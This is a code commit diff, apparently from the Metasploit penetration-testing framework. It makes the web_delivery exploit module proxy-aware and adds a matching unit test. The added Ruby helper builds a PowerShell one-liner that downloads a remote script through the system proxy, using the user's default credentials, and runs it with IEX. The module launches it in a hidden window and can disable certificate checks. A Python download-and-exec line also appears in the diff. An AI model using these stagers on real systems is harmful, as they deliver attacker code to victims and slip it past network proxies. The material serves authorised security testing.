Make web_delivery proxy aware
This commit is contained in:
parent
44fa188e71
commit
66c9222968
|
@ -72,6 +72,22 @@ module Powershell
|
||||||
def self.ignore_ssl_certificate
|
def self.ignore_ssl_certificate
|
||||||
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
|
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Use the default system web proxy and credentials to download a URL
|
||||||
|
# as a string and execute the contents as PowerShell
|
||||||
|
#
|
||||||
|
# @param url [String] string to download
|
||||||
|
#
|
||||||
|
# @return [String] PowerShell code to download a URL
|
||||||
|
def self.proxy_aware_download_and_exec_string(url)
|
||||||
|
var = Rex::Text.rand_text_alpha(1)
|
||||||
|
cmd = "$#{var}=new-object net.webclient;"
|
||||||
|
cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
|
||||||
|
cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
|
||||||
|
cmd << "IEX $#{var}.downloadstring('#{url}');"
|
||||||
|
cmd
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -89,7 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
|
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
|
||||||
when 'PSH'
|
when 'PSH'
|
||||||
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
|
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
|
||||||
download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))"
|
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
|
||||||
|
download_and_run = "#{ignore_cert}#{download_string}"
|
||||||
print_line generate_psh_command_line(
|
print_line generate_psh_command_line(
|
||||||
noprofile: true,
|
noprofile: true,
|
||||||
windowstyle: 'hidden',
|
windowstyle: 'hidden',
|
||||||
|
|
|
@ -40,5 +40,14 @@ describe Rex::Powershell::PshMethods do
|
||||||
script.include?('Get-QADComputer').should be_truthy
|
script.include?('Get-QADComputer').should be_truthy
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
describe "::proxy_aware_download_and_exec_string" do
|
||||||
|
it 'should return some powershell' do
|
||||||
|
url = 'http://blah'
|
||||||
|
script = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
|
||||||
|
script.should be
|
||||||
|
script.include?(url).should be_truthy
|
||||||
|
script.downcase.include?('downloadstring').should be_truthy
|
||||||
|
end
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue